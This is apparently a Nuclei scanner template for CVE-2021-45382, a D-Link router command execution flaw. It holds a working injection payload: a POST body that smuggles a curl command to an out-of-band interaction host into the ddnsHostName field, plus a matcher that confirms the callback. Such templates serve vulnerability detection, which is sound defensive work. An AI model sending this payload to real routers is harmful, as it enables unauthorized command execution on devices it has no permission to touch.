31 lines
1.1 KiB
YAML
31 lines
1.1 KiB
YAML
|
id: CVE-2021-45382
|
||
|
|
||
|
info:
|
||
|
name: D-Link Remote Command Execution
|
||
|
author: king-alexander
|
||
|
severity: critical
|
||
|
description: |
|
||
|
There is a remote command execution vulnerability via the DDNS function in the ncc2 binary file that affects multiple D-Link routers.
|
||
|
impact: |
|
||
|
Successful exploitation of this vulnerability could lead to system compromise.
|
||
|
remediation: |
|
||
|
The affected products are end-of-life and should be disconnected if still in use.
|
||
|
reference:
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-45382
|
||
|
- https://github.com/doudoudedi/D-LINK_Command_Injection1/blob/main/D-LINK_Command_injection.md#poc
|
||
|
tags: cve,cve2021,dlink,kev,rce
|
||
|
|
||
|
http:
|
||
|
- method: POST
|
||
|
path:
|
||
|
- "{{Host}}/ddns_check.ccp"
|
||
|
# Neither the ddnsHostName or ddnsUsername field sanitize input. For simplicty, I use dnsHostname to achieve
|
||
|
# remote code execution.
|
||
|
body: "ccp_act=doCheck&ddnsHostName=;curl https://{{interactsh-url}};&ddnsUsername=admin&ddnsPassword=123123123"
|
||
|
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: interactsh_protocol
|
||
|
words:
|
||
|
- "http"
|